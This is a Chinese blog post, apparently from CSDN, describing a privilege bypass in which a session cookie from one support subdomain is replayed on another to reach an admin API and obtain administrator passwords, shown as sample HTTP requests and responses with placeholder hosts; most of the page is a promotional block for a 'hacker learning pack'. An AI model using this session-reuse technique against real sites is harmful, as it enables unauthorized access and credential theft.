你所不知道的权限绕过思路分享(非常详细)从零基础到精通,收藏这篇就够了!

于 2025-05-14 16:07:44 发布
阅读量207 收藏
点赞数 2
文章标签: 网络 web安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Libra1313/article/details/147956869
版权

你所不知道的权限绕过思路分享

正文

这里使用的是cookie重用的思路

攻击流程:

攻击者使用Google搜索:

site:*.support.com

~结果显示xyz.support.com允许用户注册,而abc.support.com不允许注册。

在xyz.support.com注册账户

攻击者访问xyz.support.com并注册一个新账户:

攻击者访问xyz.support.com并注册一个新账户:

  
POST /api/register HTTP/1.1  
Host: xyz.support.com  
Content-Type: application/json  
  
{  
  "username": "attacker",  
  "password": "password123"  
}

~成功注册后,攻击者登录,并获得Cookie:

Set-Cookie: support_hub=xyz_auth_cookie_12345;

攻击者访问xyz.support.com/api/admin/settings,发现返回了管理设置和管理员密码:

GET /api/admin/settings HTTP/1.1  
Host: xyz.support.com  
Cookie: support_hub=xyz_auth_cookie_12345  
  
#响应  
{  
  "admin_username": "admin_xyz",  
  "admin_password": "xyz_secret_password"  
}

尝试跨子域的Cookie复用

攻击者怀疑abc.support.com和xyz.support.com共享了相同的会话管理机制,于是尝试将xyz.support.com的Cookie用于abc.support.com。

攻击者使用相同的Cookie访问abc.support.com的管理API:

GET /api/admin/settings HTTP/1.1  
Host: abc.support.com  
Cookie: support_hub=xyz_auth_cookie_12345

意外响应成功:(不使用xyz子域名的cookie那么会报错401)

{  
  "admin_username": "admin_abc",  
  "admin_password": "abc_secret_password"  
}  
  


  



![](https://img-blog.csdnimg.cn/img_convert/751a0f1b2a24f58a489ae94751c7e1c1.png)

**黑客/网络安全学习包**

![](https://img-blog.csdnimg.cn/img_convert/9bcee19268a6f5a1b46600b955ae2b66.png)

![](https://img-blog.csdnimg.cn/img_convert/eaf0737584cdc3cebce91a9aafe3df90.png)

**资料目录**

1.  成长路线图&学习规划
    
2.  配套视频教程
    
3.  SRC&黑客文籍
    
4.  护网行动资料
    
5.  黑客必读书单
    
6.  面试题合集
    

  
<font color="red">因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享](https://mp.weixin.qq.com/s/Z0QpzQFIqasJPfRNUb25dg "CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享")****************************************************************************************************************************************************************************************************************************************************************

  

1.成长路线图&学习规划

要学习一门新的技术,作为新手一定要**先学习成长路线图**,**方向不对,努力白费**。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

![](https://img-blog.csdnimg.cn/img_convert/862a9749f83812b6349e5decc6555350.png)

![](https://img-blog.csdnimg.cn/img_convert/acf39ca0bf5ea24d72639363df33eba4.png)
<font color="red">因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享](https://mp.weixin.qq.com/s/Z0QpzQFIqasJPfRNUb25dg "CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享")****************************************************************************************************************************************************************************************************************************************************************

2.视频教程

很多朋友都不喜欢**晦涩的文字**,我也为大家准备了视频教程,其中一共有**21个章节**,每个章节都是**当前板块的精华浓缩**。

![](https://img-blog.csdnimg.cn/img_convert/29673ac6bab93d161010f7245061518b.png)

![](https://img-blog.csdnimg.cn/img_convert/b474b601738145e0a293e1915530de9e.png)
<font color="red">因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享](https://mp.weixin.qq.com/s/Z0QpzQFIqasJPfRNUb25dg "CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享")****************************************************************************************************************************************************************************************************************************************************************

3.SRC&黑客文籍

大家最喜欢也是最关心的**SRC技术文籍&黑客技术**也有收录

**SRC技术文籍:**

![](https://img-blog.csdnimg.cn/img_convert/12583c7e827d2fab6b2b224ca59b0abb.png)

  

**黑客资料由于是敏感资源,这里不能直接展示哦!**

  

4.护网行动资料

  

其中关于**HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!**


  

5.黑客必读书单

**

![](https://img-blog.csdnimg.cn/img_convert/33539f7cee70f4110aeab42a95c5c2ed.jpeg)

**

6.面试题合集

  

当你自学到这里,你就要开始**思考找工作**的事情了,而工作绕不开的就是**真题和面试题。**

![](https://img-blog.csdnimg.cn/img_convert/fb966ea191c95fccd236865a64d06a0d.png)

**更多内容为防止和谐,可以扫描获取~**

![](https://img-blog.csdnimg.cn/img_convert/de34bdf226f283392e04fd4f8ac550da.png)

  
<font color="red">因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

****************************************************************************************************************************************************************************************************************************************************************[CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享](https://mp.weixin.qq.com/s/Z0QpzQFIqasJPfRNUb25dg "CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享")****************************************************************************************************************************************************************************************************************************************************************
黑客大白
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值